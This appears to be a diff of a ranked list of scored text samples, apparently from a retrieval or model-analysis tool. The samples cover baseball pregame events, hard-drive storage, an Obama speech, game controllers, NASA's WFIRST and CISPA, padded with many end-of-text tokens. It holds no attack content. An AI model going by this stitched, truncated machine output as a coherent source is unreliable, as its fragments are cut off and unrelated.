><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +· WMJI will broadcast live from Gateway Plaza from 5-8PM + +· A band will perform live on Gateway Plaza from 5-7:30PM + +· DJ Kyro among activities available in First Energy Heritage Plaza (center field) pregame + +(Cleveland Indians press release)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 29; Score = 3719168.0 +<|begin_of_text|>Electron Microscopy images of 1.9 and 3.3 Terabit/inch2 densities + +Hard drive storage continues to increase at a steady rate, but just how long can we keep squeezing more data on to those platters? TDK has managed to ensure that the density keeps rising for a few more generations with its HAMR head innovation, but that may have already been rendered redundant through another discovery by a Dr Joel Yang at the Institute of Materials Research and Engineering (IMRE). + +Existing hard drives max out at 3TB at the moment. TDK’s HAMR promises to take that to 6TB, but Dr Yang has found a way to increase the data density of a drive to 3.3 Terabit/inch2, effectively meaning 18TB hard drives are possible. + +What may surprise you is the key to this massive increase in data storage density. Dr Yang used table salt, or more specifically, sodium chloride. + +Data stored on a hard drive is done so using nanoscopic magnetic grains. Typically, several of these grains (a cluster), each measuring around 7nm, are used to store one bit of information. Therefore, if you can pack them more densely together, you get more storage in the same space. + +By adding sodium chloride to the mix, it has been possible to get a single 10nm grain storing one bit. Replacing several 7nm grains with one 10nm saves a lot of space and therefore ups the storage density considerably. + +The good news is the use of sodium chloride can be added to existing lithography processes, suggesting it won’t take too long to get this up and running for commercial drives. So far a 1.9 Terabit/inch2 storage solution has been shown to work, but that will increase to 3.3 Terabit/inch2, and then further research and development is aiming to achieve 10 Terabit/inch2 in the future. + +For us as consumers, it means the hard drive still has quite a few years of storage bumps still to come, and a greater challenge for SSDs trying to catch up with the amount of storage on offer. This also bodes well for data centers who need to cater for a never-ending storage need as more cloud services go online. + +Read more at the IMRE press release (PDF), via Physorg<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 25; Score = 7012352.0 +Rank = 30; Score = 3670016.0 <|begin_of_text|>U.S. President Barack Obama handed the torch of progressive politics to Prime Minister Justin Trudeau Wednesday in a warm, rousing speech to Parliament, in which he also bluntly urged Canada to spend more on defence to meet its international obligations. He praised the extraordinary alliance and deep friendship between Canada and the United States. @@ -587,72 +702,14 @@ His appearance on the floor of the House of Commons, alongside Trudeau and his w "It tempts me to shut up and leave. It can't get any better than this ================================================================================ -Rank = 26; Score = 7012352.0 -<|begin_of_text|>NASA’s next major space observatory is meant to tackle some of the biggest questions in astronomy when it launches in 2025—including what exoplanets look like and how dark energy is driving the Universe’s expansion. But the project’s cost is rising quickly, and NASA managers are struggling to keep its budget in check. - -The Wide-Field Infrared Survey Telescope (WFIRST) has grown in scope and complexity since it was proposed nearly a decade ago, and its price has swollen from US$1.6 billion in 2010 to the current estimate of $3.2 billion ($2.4 billion in 2010 dollars). That has raised concern at NASA, which in April commissioned a review by independent aero-space experts. Their report is due in the next few months. - -Above all, the agency wants to keep WFIRST from following the path of the James Webb Space Telescope (JWST), a successor to the Hubble telescope that is scheduled to launch in 2018. That project’s cost spiralled from $1 billion in the early 2000s to $8.8 billion—and nearly exhausted NASA’s astrophysics budget. - -The WFIRST review is meant to stave off that kind of meltdown. “This is a good time to take a look at the scale and scope of the mission,” says Jon Morse, a former head of NASA’s astrophysics division who is now chief executive of the BoldlyGo Institute, a non-profit space-exploration organization in New York City. “Nobody wants this thing to double in cost.” - -Bonus features - -WFIRST was the top-ranked big space mission in the 2010 decadal survey in astronomy and astrophysics, a list created by researchers to prioritize projects for the next ten years. Then the National Reconnaissance Office gave NASA a 2.4-metre mirror—replacing WFIRST’s planned 1.5-metre mirror—and the space agency started dreaming big. The larger mirror allowed NASA to add a corona-graph, an instrument that studies exoplanets by blocking light from the stars they orbit. - -And NASA made other design changes to go along with the big mirror. It also began to consider adding a ‘starshade’, a free-floating umbrella-like spacecraft that would fly alongside WFIRST and block enough light for the telescope to spy Earth-sized planets. - -WFIRST’s heart is a gigantic camera with 18 detectors, each capable of capturing a 16-mega-pixel shot—giving it a field of view 200 times Hubble -================================================================================ -Rank = 27; Score = 6979584.0 -<|begin_of_text|>The Peace Tower (in French: Tour de la Paix), also known as the Tower of Victory and Peace (in French: tour de Victoire et de Paix),[1] is a focal bell and clock tower sitting on the central axis of the Centre Block of the Canadian parliament buildings in Ottawa, Ontario. The present incarnation replaced the 55-metre (180 ft) Victoria Tower after the latter burned down in 1916, along with most of the Centre Block; only the Library of Parliament survived. It serves as a Canadian icon[2] and had been featured prominently on the Canadian twenty-dollar bill directly adjacent the queen's visage, until the change to polymer. - -Characteristics [ edit ] - -Designed by Jean Omer Marchand and John A. Pearson, the tower is a campanile whose height reaches 92.2 m (302 ft 6 in),[3] over which are arranged a multitude of stone carvings, including approximately 370 gargoyles, grotesques, and friezes, keeping with the Victorian High Gothic style of the rest of the parliamentary complex. The walls are of Nepean sandstone and the roof is of reinforced concrete covered with copper.[4] - -One of four grotesques at the corners of the Peace Tower - -At its base is a porte-cochere within four equilateral pointed arches, the north of which frames the main entrance of the Centre Block, and the jambs of the south adorned by the supporters of the Royal Arms of Canada. Near the apex, just below the steeply pitched roof, are the tower's 4.8 m (16 ft) diameter clock faces,[4] one on each of the four facades. The mechanical workings of the timepiece were manufactured by the Verdin Company and are set by the National Research Council Time Signal. One level below, running around the circumference of the tower's shaft, is an observation deck.[3] This was the highest accessible space in Ottawa until the early 1970s; the Peace Tower dominated the Ottawa skyline, as a strict 45.7 m (150 ft) height limit was placed on other buildings. That limit, however, was later rescinded, leading the Peace Tower to lose its distinction as the city's tallest structure. Cantilevered out at each of the four corners of the tower, at the level of the observation platform, are four 2.5 m (8 ft 4 in) long, 75 cm (2 ft 6 in) -================================================================================ -Rank = 28; Score = 6946816.0 -<|begin_of_text|>ELDERLY Australians committing welfare fraud on a massive scale are behind the extraordinarily high number of $100 notes in circulation, a former senior Reserve Bank official says. - -Yesterday the Herald revealed there are now 10 $100 notes in circulation for each Australian, far more than the more commonly seen $20 notes. - -Welfare fraud on a massive scale... elderly people wanting to get the pension are hiding their income in cash to ensure they qualify for the means-tested benefit, former Reserve official Peter Mair says. Credit:Jessica Shapiro - -One popular explanation is that they are used for illegal transactions as part of the cash economy, something the former Reserve official, Peter Mair, rejects as a "furphy". - -In a letter to the Reserve Bank governor, Glenn Stevens, dated July 4, Mr Mair laid the blame squarely on elderly people wanting to get the pension and hiding their income in cash to ensure they qualified for the means-tested benefit.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 29; Score = 6619136.0 -<|begin_of_text|>Electron Microscopy images of 1.9 and 3.3 Terabit/inch2 densities - -Hard drive storage continues to increase at a steady rate, but just how long can we keep squeezing more data on to those platters? TDK has managed to ensure that the density keeps rising for a few more generations with its HAMR head innovation, but that may have already been rendered redundant through another discovery by a Dr Joel Yang at the Institute of Materials Research and Engineering (IMRE). - -Existing hard drives max out at 3TB at the moment. TDK’s HAMR promises to take that to 6TB, but Dr Yang has found a way to increase the data density of a drive to 3.3 Terabit/inch2, effectively meaning 18TB hard drives are possible. - -What may surprise you is the key to this massive increase in data storage density. Dr Yang used table salt, or more specifically, sodium chloride. - -Data stored on a hard drive is done so using nanoscopic magnetic grains. Typically, several of these grains (a cluster), each measuring around 7nm, are used to store one bit of information. Therefore, if you can pack them more densely together, you get more storage in the same space. - -By adding sodium chloride to the mix, it has been possible to get a single 10nm grain storing one bit. Replacing several 7nm grains with one 10nm saves a lot of space and therefore ups the storage density considerably. - -The good news is the use of sodium chloride can be added to existing lithography processes, suggesting it won’t take too long to get this up and running for commercial drives. So far a 1.9 Terabit/inch2 storage solution has been shown to work, but that will increase to 3.3 Terabit/inch2, and then further research and development is aiming to achieve 10 Terabit/inch2 in the future. - -For us as consumers, it means the hard drive still has quite a few years of storage bumps still to come, and a greater challenge for SSDs trying to catch up with the amount of storage on offer. This also bodes well for data centers who need to cater for a never-ending storage need as more cloud services go online. - -Read more at the IMRE press release (PDF), via Physorg<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 30; Score = 6586368.0 +Rank = 31; Score = 3653632.0 <|begin_of_text|>Mithost said: My intention from posting my original reply was not to immediately unban the controllers, but to get more information from those in charge on what the current barriers are. If you don't mind me asking, what are some examples of the logistical issues you mention? Outside of Smash, I am an active member of the wider fighting game community. At both local tournaments and large scale events, I have seen people play with everything from a PS1 gamepad with a converter to a pizza box with 20+ buttons on it without any issues. Controller configurations that prove to be problematic from a logistical or competitive point of view are banned when they prove to be problematic at an event (most wireless controllers, turbo buttons, and certain buggy platform converters). If a community so similar to our own in terms of logistics can run well with very lax controller rules, what is different about Smash that changes the logistics enough to warrant banning the controllers? Click to expand... The main difference between Melee and other FGs, as I'm sure you know, is the use of analog controls. Replacing left, right, up, and down with digital buttons is not a huge change for the average FG. For Melee, being able to hit precise angles is obviously a very powerful technique. Whether it's for perfect up-B angles, airdodges, wavedashes/wavelands, or DI, hitting specific angles is a skill that has been an inherent part of the game since its inception. If you have a controller that can do all of this for free, you're removing skill from the game and creating an unearned skill gap between the players who use a custom controller vs. the standard. Hax himself has admitted that his perfect wavedash angles were obnoxiously good, so he has attempted to mitigate this advantage by preventing perfect angles on the B0XX. There are plenty of other issues, such as multiple SDI inputs. Due to the nature of a button vs. a stick, you can easily double/triple tap fightstick buttons to get multiple SDIs. I'm not very experienced on a fightstick, but it still only took me a few minutes of testing to get 3 inputs in a 5 frame window. This kind of capability would result in people triple SDIing shines, and would greatly ruin the integrity of the game.All of these advantages that make custom controllers able to perform things that are normally difficult or impossible would have to be limited before these controllers could be allowed. That means TOs have to decide how good ================================================================================ -Rank = 31; Score = 6520832.0 +Rank = 32; Score = 3653632.0 <|begin_of_text|>The elderly father of Metallica’s late bassist is making sure that his son’s positive legacy does not just fade to black. Cliff Burton, who was one of the founding members of Metallica, played bass guitar on the metal band’s first three albums until he was killed in a tour bus accident in 1986. @@ -669,96 +726,18 @@ The school has sentimental value to Ray since it was the school which Cliff atte The Bell Tolls For You To Send This Story To Your Friends: Click To Share<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 32; Score = 6258688.0 -<|begin_of_text|>Cleveland, OH–The Cleveland Indians today announced pregame festivities for ALCS Game 1 at Progressive Field on Friday, with first pitch set for 8PM. - -The club is encouraging all fans to #RockRed Tribe gear throughout the ALCS to help maintain the Indians incredible home-field advantage against the Blue Jays. The Indians were 53-28 at Progressive Field this season, second-best in baseball, and won two straight against Boston last weekend. - -Postseason coverage on SportsTime Ohio starting with Drennan Live at 6 p.m. Friday and then Indians Live postgame following the final pitch - -Indians Hall of Famer Andre “Thunder” Thornton will throw Friday’s ceremonial first pitch. Thornton hit 214 homers over 10 seasons with the Tribe. - -Gates will open at 6PM, and fans are encouraged to be in their seats by 7:30PM at the latest to enjoy all pregame festivities. - -Each fan will receive a red #RallyTogether towel upon entering Progressive Field. - -Pregame festivities include Tom Hamilton as emcee, Budweiser activation, Cleveland students manning American flag on field during anthem - -The Indians will have a number of festivities for fans prior to Thursday’s game. - -Other festivities include: - -· Tom Hamilton will emcee on-field pregame festivities - -· Veteran local singer Danielle Danburg will sing the American and Canadian national anthems; Dan Polk will sing “God Bless America” during the seventh inning - -· Cleveland Metropolitan School District students and staff will volunteer to man a giant American flag on field for the anthem - -· Color guards from the Army, Navy, Marines, Air Force and Coast Guard will present the colors - -· Budweiser will bring its ‘Bud and Burgers’ trailer to Gateway Plaza, where fans over the age of 21 can enjoy Budweiser products up until game time; Swenson’s Food Truck also will be on hand - -· The “Mike Trivisonno Show” will broadcast live from the main concourse (near The Corner) from 3-7:30PM - -· WMJI will broadcast live from Gateway Plaza from 5-8PM - -· A band will perform live on Gateway Plaza from 5-7:30PM - -· DJ Kyro among activities available in First Energy Heritage Plaza (center field) pregame - -(Cleveland Indians press release)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 33; Score = 6127616.0 -<|begin_of_text|>Worse than SOPA, CISPA will allow monitoring, censorship, alteration of ANY online communication - -The assaults keep coming like the Terminator, don't they? This one is bipartisan, too. Comes to you from Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD). Strongly recommend reading the entire article. - -____________________________________________ - -http://www.digitaltrends.com/web/watch-out-washington-cispa-replaces-sopa-as-internets-enemy-no-1/ - -Watch out, Washington: CISPA replaces SOPA as Internet�s Enemy No. 1 - -By Andrew Couts - -Digital Trends - -....Unveiled to the House by Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD) late last year, CISPA is described as a �cybersecurity� bill. It proposes to amend the National Security Act of 1947 to allow for greater sharing of �cyber threat intelligence� between the U.S. government and the private sector, or between private companies. The bill defines �cyber threat intelligence� as any information pertaining to vulnerabilities of, or threats to, networks or systems owned and operated by the U.S. government, or U.S. companies; or efforts to �degrade, disrupt, or destroy� such systems or networks; or the theft or �misappropriation� of any private or government information, including intellectual property. - -.... - -The Electronic Frontier Foundation (EFF) adds that CISPA�s definition of �cybersecurity� is so broad that �it leaves the door open to censor any speech that a company believes would �degrade the network.�� Moreover, the inclusion of �intellectual property� means that companies and the government would have �new powers to monitor and censor communications for copyright infringement.� - -Furthermore, critics warn that CISPA gives private companies the ability to collect and share information about their customers or users with immunity � meaning we cannot sue them for doing so, and they cannot be charged with any crimes. According to the EFF, CISPA �effectively creates a �cybersecurity� exemption to all existing laws.� - -�There are almost no restrictions on what can be collected and how it can be used, provided a company can claim it was motivated by �cybersecurity purposes,�� the EFF continues. �That means a company like Google, Facebook, Twitter, or AT&T could intercept your emails and text -================================================================================ -Rank = 34; Score = 6094848.0 -<|begin_of_text|>Prime Minister Narendra Modi has ‘replaced’ Mahatma Gandhi in the 2017 wall calendar and table diary published by the Khadi Village Industries Commission (KVIC), official sources said on Thursday, as opposition leaders reacted sharply to the move. - -The cover photo of the calendar and diary shows Modi weaving khadi on a large ‘charkha’, in the same classic pose as Gandhiji. In response, the employees of KVIC at its Vile Parle headquarters plan to stage “a silent, soul-cleansing” protest wearing black bands on their mouths, during lunch hour on Thursday. - -Political leaders took a jibe at the Prime Minister for replacing the iconic image of Gandhi, including Delhi chief minister Arvind Kejriwal, Congress vice-president Rahul Gandhi and former AAP member Yogendra Yadav, tweeting about it. - -“Becoming Gandhi requires years of austerities. One cannot become Gandhi by acting to spin the Charkha, this would only ridicule them,” Kejriwal said in a tweet. - -Gandhiji would've welcomed it, also opposed his photo on notes. - -We should welcome it too. Less hypocrisy.https://t.co/q1fVI2RYmA — Yogendra Yadav (@_YogendraYadav) January 12, 2017 - -Rahul too called Modi’s move “the mangalyaan effect”, referring to India’s Mars Orbiter Mission. - -The Mangalyaan effecthttps://t.co/NnkbJ4i7vx — Office of RG (@OfficeOfRG) January 13, 2017 +Rank = 33; Score = 3637248.0 +<|begin_of_text|>ELDERLY Australians committing welfare fraud on a massive scale are behind the extraordinarily high number of $100 notes in circulation, a former senior Reserve Bank official says. -While Gandhi’s historic picture weaving khadi on a simple charkha, wearing his trademark loin cloth, is legendary and imprinted in the minds of the masses since generations, Modi comes across in his signature attire of kurta-pyjama-waistcoat, weaving khadi on a slightly modern charkha. +Yesterday the Herald revealed there are now 10 $100 notes in circulation for each Australian, far more than the more commonly seen $20 notes. -KVIC chairman Vinai Kumar Saxena said this was “not unusual” and there have been deviations in the past. +Welfare fraud on a massive scale... elderly people wanting to get the pension are hiding their income in cash to ensure they qualify for the means-tested benefit, former Reserve official Peter Mair says. Credit:Jessica Shapiro -“The entire khadi industry (udyog) is based on Gandhiji’s philosophy, ideas and ideals, he is the soul of KVIC, so there is no question of ignoring him,” Saxena told IANS. +One popular explanation is that they are used for illegal transactions as part of the cash economy, something the former Reserve official, Peter Mair, rejects as a "furphy". -KVIC calendar & dairy without Gandhiji's pics have been issued earlier too.Spirit is more important than the image.@PMOIndia,@ashokepandit. pic.twitter.com/57ksjFD1LQ — Chairman KVIC (@ +In a letter to the Reserve Bank governor, Glenn Stevens, dated July 4, Mr Mair laid the blame squarely on elderly people wanting to get the pension and hiding their income in cash to ensure they qualified for the means-tested benefit.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|